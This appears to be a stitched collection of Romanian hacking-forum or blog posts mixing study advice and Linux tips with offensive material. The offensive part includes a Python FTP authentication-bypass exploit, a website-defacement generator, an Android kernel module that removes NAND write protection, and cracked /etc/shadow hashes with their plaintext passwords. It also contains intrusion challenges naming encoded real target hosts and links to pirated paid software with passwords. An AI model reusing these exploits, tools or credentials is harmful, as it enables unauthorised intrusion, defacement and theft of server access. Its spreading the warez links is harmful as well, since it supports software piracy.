pyth0n3

[ DetectionInfo ] * Filename: C:\analyzer\scan\FTP Brute Forcer.exe. * Sandbox name: NO_MALWARE * Signature name: W32/Bifrose.BJCO. * Compressed: YES. * TLS hooks: NO. * Executable type: Application. * Executable file structure: OK. * Filetype: PE_I386. [ General information ] * Decompressing UPX. * File length: 76800 bytes. * MD5 hash: 684a852249a9df6a64c5b7355f1d141d. * SHA1 hash: 3e87361b8106240ca6b30437cf07d57dd5b39d6f. * Packer detection: W32/UPX. Norman File name: Graeste Moldoveneste-1 - Blatnoi.mp3 Submission date: 2010-08-23 11:15:22 (UTC) Current status: analysing finished Result: 0/ 41 (0.0%) MD5 : 1b2a42730fe11e2e94adbb235854ed01 VirusTotal - Free Online Virus, Malware and URL Scanner Desi nu vad ce rost are un mp3 de 5,3 MB

#!/usr/bin/python # Acesta este un exploit care va intra oriunde # Autor: Penetration Tester # Nume: exploiter care penetreaza versiune 25 cm # 0-day , cross-platform import time import sys from socket import * print '[+] Asteapta cateva secunde...' time.sleep(2) serverhost = '127.0.0.1' buffer = ['45 78 70 6c 6f 69 74','42 6f 6f 6d'] if len (sys.argv) > 1: serverhost = sys.argv[1] print '[+] Exploitul sa trezit , mai asteapta putin...' time.sleep(2) sSock = socket(AF_INET, SOCK_STREAM) try: sSock.connect((serverhost,222)) except: print '[+] Exploitul penetreaza serverul astept un raspuns...' time.sleep(2) for word in buffer: try: sSock.send(word) data = sSock.recv(1024) except: print '[+] Serverul e jos, mam terminat ies acum... ' time.sleep(2) sSock.close() sys.exit()

HTTP Debugger Pro 4.3 | 4.38 Mb If you need to view and analyze all of the HTTP traffic between a web browser or any program that uses the HTTP protocol and the web server, then HTTP Debugger is the program for you. Web developers can view and analyze HTTP header parameter values, cookies, query strings, the source code of HTML/XML web pages and Java/VB scripts, error codes etc. They can measure the size and downloading time of their web pages and identify web site performance bottlenecks. You can improve your web programming skills by viewing and analyzing how other web sites work and how they implement certain features. Software developers can view and analyze the HTTP traffic of their own or any third party software program and the Internet, irrespective of whether this program is a user mode application or works as a Windows NT Service. System and network administrators can analyze the behavior of suspicious web sites and view what information programs have sent from your computer to their owners (for example, during a registration or update procedure). Want to see all browser http requests and server http responses? Need to analyze http headers and http content data? Try HTTP Debugger! Web developers locate and eliminate website errors analyzing http headers, query strings, cookies, redirections, authorization headers, POST parameters and error codes.For each web page analyze the number of produced http requests and responses, its size, downloading time and speed. Software developers analyze all http requests sent by own programs (C#, Java, VB, C++, Delphi, etc) and server responses. Analyze each http request and response produced by a web browser add-on, ActiveX component or Java applet. System and network administrators analyze all outgoing http requests from your computers. Analyze each http request/response header and content data to see what information is sent by programs to the Internet. HTTP Debugger Pro Key Features Full support of both 32-Bit and 64-Bit applications. Decoding of HTTPS/SSL connections and gzip/chunked content. Support of Dial-up modem, DSL/ISDN/Cable/LAN connections. Support of Internet Explorer, Mozilla Firefox, Opera and Google Chrome Download : Here Source & Password default: shytex.com

@sevex îmi explici ?i mie de ce nu vrei s? pui sursa ? O simpla explica?ie , un motiv

Daca te intereseaz? informatica , oricum sunt foarte multe lucruri care bineîn?eles nu se pot perfec?iona toate . Va trebui s? ai ni?te idei foarte clare de la bun început despre ceea ce vrei s? faci ,la inceput vroiam sa stiu tot dar am inteles ca nu se poate fi un guru in toate . In al doilea rînd trebuie s? fie ni?te reguli foarte stricte cînd deschizi calculatorul Spre exemplu : no game, no film , ?i cat se poate de pu?in chat , iar pe forum ,doar lucruri care te intereseaz? cu ceea ce vrei s? faci tu PDF-urile nu vin citite la pc ,trebuie scoase pe buc??i de hîrtie Trebuie st?pînit întîi la perfec?ie un singur limbaj de programare înainte de a trece la un altul trebuie citite spre exemplu cîteva c?r?i despre TCP/IP deoarece dac? nu cuno?ti cum func?ioneaz? protocoalele las? balta INTERNETWORKING La pc trebuie lucrat iar dac? vrei s? în?elegi la perfec?ie ce înseamna BOOTSTRAP ia ?i instaleaz? de vreo 100 de ori un sistem operativ Toate exemplele de cod care le g?se?ti in c?r?i vin scrise cu mana ta ?i executate , dup? care încerci s? modifici codul in asa fel încît s? vezi ce face dac? ii adaugi tu ceva Mai mult timp i?i ia s? cite?ti decît s? stai pe calculator Spre exemplu am v?zut multi care se ocupa de SQLI , pai ?i ce fac astia ? COPY & PASTE sql query , dar ca?i din ??tia ?tiu s? modifice sursa in asa fel încît s? nu fie vulnerabila la SQLI? De fapt uitasem , majoritatea folosesc TOOL pt SQLI dup? care umple CLUB SHOW OFF cu ceea ce de fapt nu au g?sit ei ci doar au pus un cod SQL la locul potrivit si se chiama hackeri Oricum ?tim foarte bine ca in societate trebuie s? existe ?i asemenea persoane, pun punct aici nu sunt in acest topic s? judec Daca nu se cite?te nu se poate ajunge tare departe , se vor acumula doar cîteva informa?ii iar restul va r?mîne in umbra V?zusem adesea aceste cuvinte Don't Learn to Hack, Hack to Learn! care vin interpretate in mod gresit de multe persoane Daca nu stii ce înseamna Hack urm?toarea afirmatie nu i?i va fi de folos Hack to Learn! Oricum totul trebuie programat , dac? nu ?tii de ce s? te apuci ,trebuie repede s? i?i cau?i deoarece vei r?mîne cu aceea?i idee ?i peste o gramade de timp si nu vei cunoa?te la perfec?ie nimic Cauta repede ce te intereseaz? , pune?i o regula , EX: de la 1-2 Linux security, Windows security sau ma rog (book reading) de la 2-3 python programming sau alt limbaj ( at computer) de la 3-4 pentesting pe diverse sisteme operative (at computer lab ) de la 4-5 Kernel linux, Windows , sau ma rog ce va place (book reading) de la 5-5:30 cîteva întreb?ri in IRC despre anumite lucruri care nu esti convins ca le-ai inteles dupa ce ai citit ( P.S. dac? face?i întreb?ri despre linux intrun canal IRC va vor trimite s? citi?i MAN PAGE înainte ) vreo 15 minute in forum pt ca nu trebuie citite chiar toate porc?riile ,sunt doar cateva lucruri importante Totul împreun? cu o muzica pe care o pute?i alege voi No game , no film , Timp liber : Dostoevsky sau alta carte interesanta , NO TV (o regula importanta ) Sau ma rog alte PDF-uri despre orice care te pot ajuta s? perfec?ionezi ceea ce vrei O bere , pt care fumeaz? o ?igara (de?i strica la organism , o spun pt ca am studiat nu pt alte motive ) Just need rules ! Peace !

Host is down Au ob?inut access ftp urmatorii useri : Flubber from RST Gnix from ptrace.net Au ob?inut access la webserver urm?torii useri: Flubber from RST Serverul ftp era vulnerabil la Authentication-Bypass Serverul Web era vulnerabil la Directory-Atraversal Codul pt a vedea structura de la directory era un simplu Space == %20 Watch online video ==>> Obtineti Access part1 Watch online video ==>> Obtineti Access part2 Download full video ===>> Here Aici este codul pe care l-am rescris in python pt Authentication-Bypass ftp # Original exploit was written in perl # Exploit link: [ http://www.exploit-db.com/exploits/12119/] # Software Link: [http://www.windowsftpserver.com/free_download.html] # Windows FTP Server is vulnerable to authentication-bypass # that will allow attackers to connect # with any username and password # I just rewrote this code in python import socket import sys import time print '[+] Wait...' time.sleep(1) host = '0.0.0.0' s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) def alert(msg): print >>sys.stderr, msg sys.exit(1) try: s.connect((host, 21)) except: alert('[+] Failed ' + host +' is down...') print "[+] Sending fake username..." time.sleep(1) s.send("USER whatever_here\r\n" ) print "[+] Sending fake password..." time.sleep(1) s.send("PASS something_here\r\n" ) print '[+] Creating a directory ...' time.sleep(1) s.send('MKD ' + ' owned' + '\r\n') s.recv(1024) print '[+] Work done i will exit...' time.sleep(1) s.close() #ENDP.S. dac? pe cineva îl intereseaz? poate s? ma contacteze ?i vom putea face împreuna diverse alte challenge pe diverse sisteme operative Daca va intereseaza si ma ajuta?i vom face lucruri diverse Peace!

HINT: Pt a modifica pagina web trebuie s? ave?i access la server [you need the credentials] Take a look behind the curtain ... The web server is vulnerable Watch on-line in real time streaming the screen of server host = 68 74 74 70 3a 2f 2f 6d 77 65 62 73 65 72 76 65 72 2e 73 65 6c 66 69 70 2e 6f 72 67 3a 38 39

Target = 01101000 01110100 01110100 01110000 00111010 00101111 00101111 01101101 01110111 01100101 01100010 01110011 01100101 01110010 01110110 01100101 01110010 00101110 01110011 01100101 01101100 01100110 01101001 01110000 00101110 01101111 01110010 01100111 1. crea?i un director in serverul ftp sau un file in care pune?i semn?tura 2. pune?i o semn?tura pe pagina web TIME = 24 hours Watch online in real time streaming the screen of server host = 68 74 74 70 3a 2f 2f 6d 77 65 62 73 65 72 76 65 72 2e 73 65 6c 66 69 70 2e 6f 72 67 3a 38 39 Information Gathering: 23 port open protocol tcp service telnet 53 port open protocol tcp service domain 80 port open protocol tcp service http 89 port open protocol tcp service su-mit-tg 21 port open protocol tcp service ftp 5801 port open protocol tcp service vnc-http-1 5901 port open protocol tcp service vnc-1 Operating System is Windows Server 2008 SP2 P.S. As prefera s? modifica?i pagina HTML care e ?i s? ad?uga?i doar o semn?tura intrun tag , in acest caz to?i au posibilitatea s? î?i pun? semn?tura

- Advanced Task Manager 4.0.1 - ahome 3.0.1 - Better Cut 2.2 - Better Keyboard 6.4 - cache Mate - PhotoSlide - Photo Vault 1.5.0 - bTunes release 1.35 - BooleanCorp - counter Cultured - Docstogo App - TweetCaster Key 1.0 - TweetCaster 1.0 - Easy money 1.4.0 - Hoot Suite Droid Full 1.0.5 - Kosenkov protector - Koushikdutta Rom manager license - Levelup Beautiful widgets 2.99 - Rerware Android MyBackup Pro 2.3.3 - Shinycore Picsaypro - Slgmobile Beamreader - Slbmobile Beamreader key - Softwareforme PhoneMyPC 1.0.16 - Spudpickles ghostradar - Trileet android newsroompro 1.6.18 - Twofortyfouram locale 1.1.1 - UBQ sixteenbars main - Comcerience reader App 2.12 - Cp 8.0.0.606 sinky - DXtop 2.7.0 - EasyTether 0.9.3 - GameBoid 1.7.9 - Gensoid 1.8.8 - HideNSeek 2.21 - iQuran Pro - Lock 2.0.3.2 - Music online 1.8.6 - MusicalPro 3.5.1 - My Backup Pro 2.33 - Nesoid 1.9.11 - Smart Keyboard pro - Nitrodesk Exchange by Touchdown 5.0.0002 - Note Everything pro 1.2.0 - Open Home 4.5 - Pure calender widget 1.8.2 - Root Explorer2.9.4 - SetCPU 1.5.1 - Setting Profiles 1.0.14.4 - slideit keyboard 1.5.2 - Tapatalk Pro 1.4.3 - Titanium Backup 2.9.7.6 - Touiteur Premium Key 1.0 - Twidroid Pro 3.2.2 - UkconeLandTheResavignette 1.0.0 - Ultimate Juice 1.3.0 - Ultra Chron 1.6.3 - Weather & Toggle Widgets 5.5 - WeatherBug Elite 2.3.234 - xScope 4.7 Browser Download: Hotfile.com: One click file hosting: 60.Paid.Apps.Pack.Android-FF.rar Source & password default shytex.com

Chiar dac? bucata de cod nu are prea mult sens , userul va pune in input doar ceea ce ii permit eu In multe limbaje de programare majoritatea las? ca userul sa poat? introduce ceea ce vrea in input ?i cat vrea , in cazul meu nu este nici o problema pt ca scriptul va scrie intrun file HTML ceea ce ia in input de la user , dar in majoritatea cazurilor programatori gresesc foarte mult ?i las? orice ca s? poat? fi introdus ca input Cînd vine vorba de securitate este important s? se aplice in orice caz de ce asa print >> myfile, '<p align="center"><b><font color=','"',(var8),'"','size="3">' de ce nu asa myfile.write('<p align="center"><b><font color=','"',(var8),'"','size="3">') Se poate face cum vrei , prefer s? folosesc print >> îmi este mai comod deoarece in BASH vin folosite des caracterele >> care fac cam acela?i lucru

It will take an HTML file and will deface Use: deface.py yourpage.html #!/usr/bin/python #Date:10.08.2010 #Purpose: Deface HTML files #Author: pyth0n3 #Blog: http://pyth0n3.blogspot.com/ import sys import time if len(sys.argv) < 2: print 'Usage deface.py index.html , this will create an index.html file with deface .' sys.exit() file = sys.argv[1] myfile = open(file,'w') print ' Colors: ' print '================================================================' print ' | black | white | ' print '================================================================' while True: var = raw_input ('1.Type the color for background here => ') if var in ['black','white','other']: break else: print 'Wrong color..!' print >> myfile, '<body bgcolor=','"',(var),'"','>' print '================================================================' print ' Colors ' print ' | black | white | green | red | purple | blue | gray | ' print '================================================================' while True: var1 = raw_input ('2.Type the text color here => ') if var1 in ['black','white','green','orange','red','purple','blue','gray']: break else: print 'Wrong color..!' print >> myfile, '<p align="center"><b><font color=','"',(var1),'"','size="3">' if var == 'black': print '================================================================' print ' Choose an image : ' print '| hacked1 | fingerprint | spy | hacked2 | silence | gameover |' print '| leg | hand | hitman | smoke | hacked3 | ' print ' | other | ' print '================================================================' while True: var4 = raw_input ('3.Put the image name here => ') if var4 in ['hacked1','fingerprint','spy','hacked2','silence','gameover','leg','hand','hitman','smoke','hacked3','other']: break else: print 'Wrong image name..! ' print '================================================================' if var4 == 'fingerprint': print >> myfile,' <center><img src="http://www.mandel.ro/logos/animFingerprintBlack.gif"></center>' if var4 == 'hacked1': print >> myfile,' <center><img src="http://site.mynet.com/the_chip/hacked2323.jpg"></center>' if var4 == 'spy': print >> myfile,' <center><img src="http://www.bluesilk.hu/images/stories/spy.gif"></center>' if var4 == 'hacked2': print >> myfile,' <center><img src="http://expclan.comli.com/index_files/43084476ii9.png"></center>' if var4 == 'silence': print >> myfile,' <center><img src="http://demafmipauns.files.wordpress.com/2010/05/sayu0i.jpg"></center>' if var4 == 'gameover': print >> myfile, '<center><img src="http://img10.imageshack.us/img10/4974/yumaqalt.jpg"></center>' if var4 == 'leg': print >> myfile, '<center><img src="http://img268.imageshack.us/img268/6802/thehackerericborgozone1.jpg"></center>' if var4 == 'hand': print >> myfile, '<center><img src="http://i728.photobucket.com/albums/ww286/vyc0d/owned.jpg"></center>' if var4 == 'hitman': print >> myfile, '<center><img src="http://t0.gstatic.com/images?q=tbn:lYCsFDr4o7mh1M:http://www.renoascensori.it/hacked.jpg&t=1"></center>' if var4 == 'smoke': print >> myfile, '<center><img src="http://t1.gstatic.com/images?q=tbn:YgDh8qCPAtwgoM:http://i46.tinypic.com/2gtxdo1.jpg&t=1"></center>' if var4 == 'hacked3': print >> myfile, '<center><img src="http://img.webme.com/pic/c/cobbra-g3ncii/hacked.jpg"></center>' if var4 == 'other': while True: var4 = raw_input ('Please enter the URL of your picture here: ' ) if var4.endswith(('.jpg','.png','.gif','.JPG','.PNG','.GIF')) : break else: print 'Wrong image name..! ' print >> myfile,'<center><img src="',(var4),'"></center>' if var == 'white': print '================================================================' print ' Choose an image : ' print ' | eye | door | fingerprint | wanted | sleep | other | ' print '================================================================' while True: var4 = raw_input ('3.Put the image name here => ') if var4 in ['door','fingerprint','wanted','sleep','eye','other']: break else: print 'Wrong image...' print '================================================================' if var4 == 'door': print >> myfile,'<center><img src="http://www.cdscreative.com/images/door.jpg"></center>' if var4 == 'fingerprint': print >> myfile,' <center><img src="http://www.idfpr.com/DPR/images/fingerprint.gif"></center>' if var4 == 'wanted': print >> myfile,' <center><img src="http://www.allstarcardsinc.com/_derived/buy_list.htm_txt_wanted1.gif"></center>' if var4 == 'sleep' : print >> myfile,' <center><img src="http://www.do2learn.com/picturecards/images/imageschedule/sleep_l.gif"></center>' if var4 == 'eye' : print >> myfile,' <center><img src="http://www.christina-reysen.com/images/eye_open.gif"></center>' if var4 == 'other': while True: var4 = raw_input ('Please enter the URL of your picture here: ' ) if var4.endswith(('.jpg','.png','.gif','.JPG','.PNG','.GIF')) : break else: print 'Must enter an URL that contains an image file..! ' print >> myfile,'<center><img src="',(var4),'"></center>' print '================================================================' while True: var2 = raw_input ('4.put your signature here => ') if len(var2) < 30 : break else: print 'Signature too large..!' print >> myfile, '<script>' print >> myfile, 'if (document.layers)' print >> myfile, 'var ns4def=""' print >> myfile, '</script>' print >> myfile, '<p align="center"><b><font size="4">' print >> myfile, '<h2 id="flyin"style="position:relative;left:-400;font-style:italic"' print >> myfile, 'style=&{ns4def};>' print >> myfile, '<font face="Arial">','Owned by',(var2),'</font></h2>' print >> myfile, '</font></b></p>' print >> myfile, '<script language="JavaScript1.2">' print >> myfile, 'if (document.getElementById||document.all)' print >> myfile, 'var crossheader=document.getElementById? document.getElementById("flyin").style : document.all.flyin.style' print >> myfile, 'function animatein(){' print >> myfile, 'if (parseInt(crossheader.left)<0)' print >> myfile, 'crossheader.left=parseInt(crossheader.left)+20' print >> myfile, 'else{' print >> myfile, 'crossheader.left=0' print >> myfile, 'crossheader.fontStyle="normal"' print >> myfile, 'clearInterval(start)' print >> myfile, '}' print >> myfile, '}' print >> myfile, 'if (document.getElementById||document.all)' print >> myfile, 'start=setInterval("animatein()",50)' print >> myfile, '</script>' print >> myfile, '<p>' print >> myfile, '<font face="Tahoma"><a target="_blank"' print '================================================================' print ' Choose: ' print ' | yes | no | ' print '================================================================' while True: var7 = raw_input ('Do you want to add some other text message?: ') if var7.lower() == 'no' : print '================================================================' print ' Wait...' time.sleep(1) myfile.close() print 'Your HTML file is ready ,I will exit now... ' time.sleep(2) sys.exit() elif var7.lower() == 'yes' : break else: print ("Please enter 'yes' or 'no' ...!") print '================================================================' print ' Choose one of the color from the list ' print ' | black | white | green | red | purple | blue | gray | ' print '================================================================' while True: var8 = raw_input ('Type the text color that you want here => ') if var8 in ['black','white','green','orange','red','purple','blue','gray ']:break else: print 'Wrong color..!' print >> myfile, '<p align="center"><b><font color=','"',(var8),'"','size="3">' print '================================================================' while True: var9 = raw_input ('Put your comments here => ') if len(var9) < 150 : break else: print 'Comments are too large..!' print >> myfile, var9 print >> myfile, '</font></b></p>' print '================================================================' print 'Processing your HTML file please wait... ' time.sleep(2) print '...' time.sleep(2) myfile.close() print ' Work done ,your HTML file was defaced , i will exit... ' time.sleep(1) sys.exit() #END Download file ===>>> here md5sum 31a5f85b90bf7cf80ef91e4a4d8f1a9b deface.py

?? ? ???? ??? ????? ???????? "????????! ?????? ???????????? ? ???????? ????" ? ??? ??????? ??? ,? ???? ???? ??????????? ????????? ??? ????? ?? ?????? ??????? ??? ????? : >31+T)%.?- thr8u0t1dz emmmcdxgaz xqPaXbKgtC OJBQDKCJLO 0237596042 '+"`^`~@~, __-____---

Nu vad nici un sens ca aceste 2 sisteme operative diverse sa fie comentate intrun asemenea fel Ar trebui folosit un sistem operativ unde reusesti sa iti faci treba repede si bine Este bine sa cunosti cum functioneaza multe sisteme operative diverse Fiecare lucreaza unde reuseste mai bine Cel mai desgustator lucru e sa vezi cand multi comenteaza aiurea fara sa cunoasca cum functioneaza un anumit sistem Pot fi facute diferente si asemanari intre aceste 2 sisteme operative dar in primul rand trebuie cunoscute bine Nu vad nici un sens in : "Linux nu imi place pt ca daca am o problema trebuie sa formatez" Sau: "Windows este mai bun pt ca vine folosit chiar si de cele mai mari corporation " Vad doar persoane care inca nu inteleg cum functioneaza nici unul dintre aceste sisteme operative

Sbackup Debian -- Package Search Results -- sbackup apt-get install sbackup Simple how to Debian or Ubuntu =>>> Backup and Restore Your Ubuntu System using Sbackup -- Debian Admin

Thanks, apropo interesant blogul contagiodump are news pt threats, observations, and analyses si e de sex feminin tipa Mai are un blog BugiX - Security Research

Must edit the file /etc/network/interfaces Here is an example for the wireless configuration file # This file describes the network interfaces available on your system # and how to activate them. For more information, see interfaces(5). # The loopback network interface auto lo iface lo inet loopback #the wifi network interface # my wifi interface is called rausb0, # I knew that by typing ifconfig and iwconfig (see below) auto rausb0 iface rausb0 inet dhcp wireless-essid my_essid wireless-mode managed wireless-key AF32852BE7A39B522BG60C4353 # The wep key which appear here is just an example. This is not # really my web key, which is secret If you have access to a GUI based interface you can install the wicd , cause is better than the default one Wicd 1.5.9 is included in Debian Squeeze and Sid, so you can just use apt-get install to get it. In Debian Lenny, 1.5.9 is a backport, so installing it requires additional work. Add this to /etc/apt/sources.list: deb Index of /debian lenny-backports main contrib non-free Follow this with apt-get update and then apt-get -t lenny-backports install wicd. For those running Debian experimental, 1.6 is in the main repository.

Exploit an unpatched bug for 2.6.29 kernel version of htc android based to get root This flaw was found by xda-developers This procedure can be also automated by writting a script in some programming language Video ===>>> Watch online Video ===>>> Download video Tools download: Android SDK ===>>> Download here Tat00hack ===>>> Download here Exploit source code #include <linux/module.h> #include <linux/kernel.h> #include <linux/delay.h> #include <linux/errno.h> #include <linux/io.h> int __init unprotect_nand(void) { int* addr; printk("Hack: unprotecting Tattoo system partition\n"); addr = ioremap(0xA0B00000, 0x1000); if (addr) { printk("NAND protect value 0x%X\n", *addr); *addr = 0; iounmap(addr); } printk("Done - now be extremly careful!!!\n"); return 0; } void __exit unprotect_nand_exit(void) { printk("unprotect nand modukle exit!\n"); } module_init(unprotect_nand); module_exit(unprotect_nand_exit); MODULE_DESCRIPTION("Tattoo hack - enable write protect"); MODULE_AUTHOR("bool_s"); MODULE_LICENSE("GPL");G

Cat de sigur esti cand te coleghezi la un vpn care ofera serviciu public si spune ca nu salveaza loguri ? Siguranta == 0

@phantomas90 Singurul punct de remote access era bruteforce ssh sau ftp Bineinteles daca se facea bruteforce sau dictionary attack ssh putea fi descoperit si passwordul root Serverul ssh era configurat in asa fel incat sa se poata face dictionary attack Vreau doar sa spun ca server-urile ssh sunt foarte bine configurate de default Cel putin mas gandi de 2 ori inainte sa fac un bruteforce la un ssh version 2 Daca se facea offline cracking se putea obtine passwordul la user In acest caz se obtinea un access local iar aici se putea face privilege escalation pt a obtine access root In legatura cu timpul pt a face un dictionary attack depinde , in video am folosit un dictionar de 1500 de cuvinte si a durat putin ,cateva secunde Oricum JTR are multe optiuni si spre exemplu cuvintele din dictionar nu vin luate la rand , poate fi personalizat @florin91 Am folosit o distro de backtrack4 in video iar in legatura cu domeniul serverului era ceva luat la intamplare , bineinteles la un moment dat multi probabil sau gandit la ftp Probabil pe viitor voi mai face ceva de acest gen , dar cu mai multe posibilitati de remote attack , daca cineva are idei si vrea sa facem ceva astept sa ma contactati

E un script in perl care foloseste functia crypt() deci cam ceea ce face si jtr E interesant scriptul oricum si functioneaza bine Un simplu exemplu de cum vin criptate passwordurile in linux folosind un SALT ar fi urmatorul #!/usr/bin/perl $plaintext = "234234"; $salt = "39"; $hash = crypt($plaintext,$salt); print "crypt($plaintext,$salt)= $hash\n";

PAM - Pluggable Authentication Modules in Linux este configurat in asa fel incat sa nu permita password mai mici de 6 caractere Chiar daca se va modifica /etc/login.defs in asa fel incat modulul PASS_MIN_LEN == 3,2 sau 1 Nici in acest caz PAM nu va permite ca passwordul sa fie de 3 sau 2 caractere deoarece va fi controlat de catre modulul pam_crack Bineinteles cred ca poate fi configurat in asa fel incat sa poata fii folosite passworduri cu mai putine caractere Probabil ar fi trebuit dezactivat cracklib check si in acelasi timp configurat /etc/login.defs intrun mod personalizat , oricum depinde si de ce fel de distro vine folosita deoarece ,PAM vine configurat in diverse moduri Passwordlist care am folosit ===>>> unix_worlist_dictionary

Internetwork Expert’s CCIE Routing & Switching Open Lecture Series is an ongoing online course – keeping in line with our revolutionary CCIE RS 4.0 Program model – which provides candidates continuing live interaction with the industry’s most experienced CCIE authors and instructors. The dynamic format of this series ensures that candidates always have an outlet for getting their questions answered in real-time throughout the lifetime of their preparation. Download Hotfile.com: One click file hosting Source & password default booktraining.org

Encrypted user password user:$6$hVAnEqBM$TpMGZM.maVWicrhEyCZregyDqvgKvNpYTfAdfojx5//dx1vQKAWIPQ3Nlr37Yfda4MJNOMwIOAM05aBrOGVaq.:14815:0:99999:7::: Plaintext: geterror Avand access ca user in ssh se putea citi /etc/shadow , iar de acolo se putea extrage passwordul de root Encrypted root password root:$6$8Kqd1oRm$whFx9Sl5HLaeIUwEZjGTg5L2It51fOD7YyWe/WXeWGz3H1FzVyyYlwXwA4ALo1h5n22jXuuRrIc8uCaUriHta/:14815:0:99999:7::: Plaintext: unixdomain Se putea face bineinteles si bruteforce pe ssh si ftp Dar intre toate variantele offline cracking e cea mai buna Note: Inainte de a incepe a face un bruteforce ssh ar trebui cunoscut protocolul ssh Multi iau un script si fac bruteforce si habar nu au ce se intampla De default serverul ssh inchide conexiunea dupa 6 incercari gresite Serverul a fost setat sa inchida conexiunea dupa 100 fails And here we come suicide hackers P.S. Nu se face bruteforce de acasa man ssh Video get access using jtr ===>>> Watch online Download video from here server.5.ftpaccess.cc = server down

1 decodati adresa c2VydmVyNS5mdHBhY2Nlc3MuY2M= 2 obtineti access ssh 2 creati un file in home in care puneti semnatura si de pe ce forum sunteti 3 obtineti access root 4 creati un deface la pagina Hint: UNIX-Where there is a shell, there is a way username = user password encoded = 75 73 65 72 3a 24 36 24 68 56 41 6e 45 71 42 4d 24 54 70 4d 47 5a 4d 2e 6d 61 56 57 69 63 72 68 45 79 43 5a 72 65 67 79 44 71 76 67 4b 76 4e 70 59 54 66 41 64 66 6f 6a 78 35 2f 2f 64 78 31 76 51 4b 41 57 49 50 51 33 4e 6c 72 33 37 59 66 64 61 34 4d 4a 4e 4f 4d 77 49 4f 41 4d 30 35 61 42 72 4f 47 56 61 71 2e 3a 31 34 38 31 35 3a 30 3a 39 39 39 39 39 3a 37 3a 3a 3a Information Gathering : 21 tcp port open , service vstpd 22 tcp port open , ssh (protocol 2.0) OpenSSH_5 80 tcp port open ,service httpd 2.2.9 Linux kernel 2.2.26-2-686 Debian Lenny Timp la dispozitie cam 48 de ore Dupa care public un video cu o varianta de access Voi publica si o lista cu cei care au reusit

De vina este slabiciunea creierului care executa ceea ce vine prezentat de catre media Nu imi vine sa cred ca media devine cel mai tare social-engineer P.S Pyth0n3 rules == no TV , i'm talking seriously i have almost 2 years i'm not watching TV Cause is nothig good to watch TV ,there is only bulls**t